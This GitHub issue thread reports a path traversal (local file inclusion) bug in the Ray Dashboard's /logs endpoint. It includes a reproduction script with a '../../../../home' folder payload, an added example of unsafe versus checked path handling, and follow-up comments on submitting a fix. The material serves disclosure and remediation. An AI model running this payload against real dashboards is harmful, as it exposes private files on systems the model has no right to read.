ray-project / ray

Ray is a unified framework for scaling AI and Python applications. Ray consists of a core distributed runtime and a set of AI Libraries for accelerating ML workloads.
https://ray.io
Apache License 2.0

Ray Dashboard is susceptible to a Local File Inclusion bug with default settings #45751

Open rmhowe425 opened 4 months ago

rmhowe425 commented 4 months ago

What happened + What you expected to happen

Description Just as the title suggests, when initially starting up the Ray dashboard I can parse my local file system by supplying the folder HTTP parameter in GET requests to the /logs API endpoint in conjunction with relative file paths.

Expected Behavior As a best practice, relative file paths should not be permitted, or should be ignored. Basic access controls should be implemented to prevent unauthorized users from being able to parse the underlying file system being used by Ray.

Useful Information 1) Taking a cursory glance at the Ray GH Issues board, it appears that this issue was discussed (and addressed) here and here

2) As seen in the provided script, the nodeId HTTP parameter must be included in GET requests.


Versions / Dependencies

2.9.1 and 2.23.0

Reproduction script

from requests import get

# Placeholders: fill in the dashboard host and a node ID taken from the dashboard.
url = 'http://<ip address>:8265/#/logs'
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate, br, zstd',
}

# Traversal payload in the folder parameter; nodeId must be supplied as well.
params = {'folder': '../../../../home', 'nodeId': '<nodeId>'}

try:
    resp = get(url=url, params=params, headers=headers)
except Exception as e:
    print(f'GET request failed: {str(e)}')
    raise SystemExit(1)

if resp.status_code != 200:
    print(f'ERROR server responded with: {resp.status_code}, {resp.content}')
else:
    print(f'Response\n==========\n{resp.content}')

Issue Severity

Medium: It is a significant difficulty but I can work around it.
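The report above asks that relative paths in the folder parameter be rejected or ignored. The following is an added example, not Ray's own code and not the reporter's: it puts the vulnerable "join whatever the client sent" pattern next to a check that confines the resolved path to the log root, and wraps it in a hypothetical handler that also requires the nodeId parameter mentioned in the report. The LOG_ROOT path, the function names and the query dictionaries are assumptions for this illustration; the demo directory is constructed on the fly.

```python
import tempfile
from pathlib import Path
from typing import Dict, Tuple, Union

# Hypothetical log root; Ray's real session directory layout is not assumed here.
LOG_ROOT = Path("/srv/ray/session_latest/logs")


def unsafe_log_dir(log_root: Path, folder: str) -> Path:
    """Vulnerable pattern: trust `folder` and just join it onto the root.

    Path.resolve() normalises '..', so '../../../../home' walks out of
    log_root and the caller lists whatever directory it points at.
    """
    return (log_root / folder).resolve()


def safe_log_dir(log_root: Path, folder: str) -> Path:
    """Resolve log_root/folder and refuse anything that escapes log_root.

    Absolute values are rejected outright (Path('/x') / '/etc' is '/etc'),
    and the resolved result must be the root itself or a descendant of it.
    resolve() follows symlinks in existing components, so a symlink planted
    inside the log directory cannot be used to point outside it either.
    """
    if Path(folder).is_absolute():
        raise ValueError("absolute paths are not allowed in folder")
    root = log_root.resolve()
    candidate = (root / folder).resolve()
    if candidate != root and root not in candidate.parents:
        raise ValueError(f"folder {folder!r} escapes the log directory")
    return candidate


def escapes_root(log_root: Path, folder: str) -> bool:
    """True if safe_log_dir would reject `folder` for this root."""
    try:
        safe_log_dir(log_root, folder)
    except ValueError:
        return True
    return False


def list_logs(query: Dict[str, str], log_root: Path = LOG_ROOT) -> Tuple[int, Union[str, list]]:
    """Hypothetical handler shape for GET /logs?nodeId=<id>&folder=<dir>:
    validate both parameters before touching the filesystem, return (status, body)."""
    if not query.get("nodeId"):
        return 400, "nodeId is required"
    try:
        target = safe_log_dir(log_root, query.get("folder", ""))
    except ValueError as exc:
        return 400, str(exc)
    if not target.is_dir():
        return 404, "no such log folder"
    return 200, sorted(p.name for p in target.iterdir())


def make_demo_root() -> Path:
    """Constructed fixture: a throwaway log root with a couple of files,
    plus a sibling directory that a traversal payload would reach."""
    base = Path(tempfile.mkdtemp(prefix="ray-lfi-demo-"))
    root = base / "logs"
    (root / "worker").mkdir(parents=True)
    (root / "raylet.out").write_text("raylet log line\n")
    (root / "worker" / "worker-1.err").write_text("worker stderr\n")
    (base / "secret").mkdir()
    (base / "secret" / "id_rsa").write_text("not a real key\n")
    return root


if __name__ == "__main__":
    root = make_demo_root()
    # The unsafe join happily lists the sibling 'secret' directory.
    print(sorted(p.name for p in unsafe_log_dir(root, "../secret").iterdir()))
    # The checked handler refuses the same payload and serves only the root.
    print(list_logs({"nodeId": "n1", "folder": "../secret"}, root))
    print(list_logs({"nodeId": "n1", "folder": "worker"}, root))
```

The check compares resolved paths rather than inspecting the string for "..", so encoded or doubled-up separators and symlinks are handled by the same rule: the final location must sit under the log root.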

rmhowe425 commented 3 months ago

@anyscalesam Happy to try and submit a PR for this issue

rmhowe425 commented 3 months ago

@anyscalesam I'll go ahead and draft up a PR for this issue

brycehuang30 commented 3 months ago

@rmhowe425 Thanks for reporting and taking this issue. I've assigned the issue to you, but please feel free to drop the assignment if you decide not to submit the PR. Do you mind linking back to this issue when you post the PR?

rmhowe425 commented 3 months ago

@brycehuang30 Absolutely!

rmhowe425 commented 3 months ago

@brycehuang30 @anyscalesam Hey guys n00b question here.

I'm going through the Setting up your Development Environment instructions and I'm having some issues. I followed the instructions for Preparing to build Ray on Linux and I'm trying to run the command: pip install -e . --verbose

However, towards the very end of the build my RAM (16 GB) is maxed out and my computer freezes up. Surely I'm not the only one to experience this problem. Any suggestions on steps that I can take to optimize the build process so that I can push forward with my contribution for this GH issue?

anyscalesam commented 3 months ago

Cc @aslonnie